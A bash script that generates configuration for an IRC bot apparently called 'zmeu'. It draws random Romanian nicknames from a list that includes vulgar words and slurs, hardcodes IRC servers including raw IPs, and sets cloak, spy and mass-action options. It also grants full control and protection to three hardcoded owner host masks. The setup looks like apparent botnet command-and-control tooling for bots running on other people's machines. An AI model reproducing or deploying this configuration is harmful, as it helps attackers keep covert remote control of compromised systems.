#!/bin/bash

Denominations="direct
original
star
Ringo
gringo
Huiduit
apostrofat
aplaudat
Husenu
rege
neincoronat
Tata
sot
anonim
celebru
alb
negru
Rebelu
stapan
sluga
inger
drac
Oportunist
egoist
profesionist
Depravat
recidivist
Vanzatoru
etichetat
reprezentant
al
subculturii
Sunt
micutul
vrajitor
tip
peste
tarfe
grasu
sanatos
jegos
politicos
Sarpele
prietenos
os
scarbos
artist
poetu
afacerist
hot
comunist
terorist
pion
eroul
ultragiator
revolutionar
obsedat
violator
gabori
Psihopat
taranul
educat
cacat
idol
parolist
puscarias
labagiu
inchis
Betiv
incult
las
barbat
baietel
spargator
de
banci
ciorditor
Fenomenal
profesional
mortal
mercenar
adevarat
Paranormal
superstar
golan
Sinatra
iubit
urat
frumos
pizda
bulangiu
pervers
romantic
su
supra
supranatural
l0ver
nebun
afemeiat
stricat
drogat
prost
mincinos
genial"
denomination=($Denominations)
num_denominations=${#denomination[*]}

echo "SERVER 82.76.255.62 6667" >> zmeu.ini
echo "SERVER 94.125.182.255 6667" >> zmeu.ini
echo "SERVER 154.35.175.201 6667" >> zmeu.ini
echo "SERVER 198.148.91.146 6667" >> zmeu.ini
echo "SERVER 208.64.123.210 6667" >> zmeu.ini
echo "SERVER 173.245.201.28 6667" >> zmeu.ini
echo "SERVER 91.236.182.1 6667" >> zmeu.ini
echo "SERVER eu.undernet.org 6667" >> zmeu.ini
echo "SERVER us.undernet.org 6667" >> zmeu.ini
echo "SERVER ix.undernet.org 6667" >> zmeu.ini
echo "SERVER irc.undernet.org 6667" >> zmeu.ini

echo "ENTITY $2" >> zmeu.ini

echo "###BOT 1###" >> zmeu.ini
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> zmeu.ini
echo "USERFILE $2.mif.user" >> zmeu.ini
echo "CMDCHAR -" >> zmeu.ini
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> zmeu.ini
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> zmeu.ini
echo "MODES +ix-ws" >> zmeu.ini
echo "HASONOTICE" >> zmeu.ini
echo "VIRTUAL $2" >> zmeu.ini
echo "TOG CC          1" >> zmeu.ini
echo "TOG CLOAK       1" >> zmeu.ini
echo "TOG SPY         1" >> zmeu.ini
echo "SET OPMODES     6" >> zmeu.ini
echo "SET CTIMEOUT    60" >> zmeu.ini
echo "SET CDELAY      30" >> zmeu.ini
echo "SET BANMODES    6" >> zmeu.ini
echo "CHANNEL         #$1 " >> zmeu.ini
echo "TOG PUB         1" >> zmeu.ini
echo "TOG MASS        1" >> zmeu.ini
echo "TOG SHIT        1" >> zmeu.ini
echo "TOG PROT        1" >> zmeu.ini
echo "TOG ENFM        0" >> zmeu.ini
echo "TOG RV          1" >> zmeu.ini
echo "SET AAWAY       1" >> zmeu.ini
echo "SET MKL         3" >> zmeu.ini
echo "SET MBL         3" >> zmeu.ini
echo "SET MPL         2" >> zmeu.ini
echo "SET MDL         3" >> zmeu.ini

echo "handle  x " >> $2.mif.user
echo "mask  *!*@basarabu.users.undernet.org " >> $2.mif.user
echo "prot  4" >> $2.mif.user
echo "aop  1 " >> $2.mif.user
echo "channel   * " >> $2.mif.user
echo "access  100 " >> $2.mif.user

echo "handle  x " >> $2.mif.user
echo "mask  *!*@suntzu.users.undernet.org " >> $2.mif.user
echo "prot  4" >> $2.mif.user
echo "aop  1 " >> $2.mif.user
echo "channel   * " >> $2.mif.user
echo "access  100 " >> $2.mif.user

echo "handle  x " >> $2.mif.user
echo "mask  *!*@vitiusha.users.undernet.org " >> $2.mif.user
echo "prot  4" >> $2.mif.user
echo "aop  1 " >> $2.mif.user
echo "channel   * " >> $2.mif.user
echo "access  100 " >> $2.mif.user
